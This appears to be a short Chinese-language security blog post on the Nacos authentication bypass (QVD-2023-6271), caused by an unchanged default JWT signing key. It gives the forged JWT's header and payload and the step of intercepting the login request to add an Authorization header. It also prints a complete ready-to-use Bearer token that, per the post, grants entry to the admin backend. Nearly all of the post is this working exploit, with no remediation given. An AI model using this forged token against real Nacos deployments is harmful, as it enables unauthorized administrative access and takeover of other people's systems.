互动

Nacos 身份认证绕过

Aurora 字数: 3571 阅读耗时: 8 分钟 2025/03/18 2025/03/18 博客独享热度: 15 评论: 0

Nacos 身份认证绕过漏洞(QVD-2023-6271)，开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果

通过构造JWT，进入后台

HEADER

{
  "alg": "HS256",
  "typ": "JWT"
}

PAYLOAD

{
  "sub": "nacos",
  "exp": 9999999999
}


SIGNATURE

在登录请求中，拦截数据包，添加Authorization信息后放包

Authorization: Bearer <构造的token>
这里的token，如果是扫描出来的漏洞一般搜扫描器会给出直接使用即可，没有的话自己构造一个即可

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.3vOsggbGE0vWpwYZKkUVCzd6zsh2HOteo6N3DYgXVHY

请求头加入Authorization: Bearer xxx 放包成功进入系统

Aurora

分享知识与科技生活

打赏作者

感谢你赐予我前进的力量

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 Aurora

阅读建议

匿名评论隐私政策

你无需删除空行，直接评论以获取最佳展示效果

你好啊！

专业的网络安全与渗透测试实战平台，提供AI安全应用开发指南及安全编程代码解析。涵盖Web攻防演练、漏洞修复方案、CTF挑战教程、智能安全系统开发，助力提升数字安全防护能力。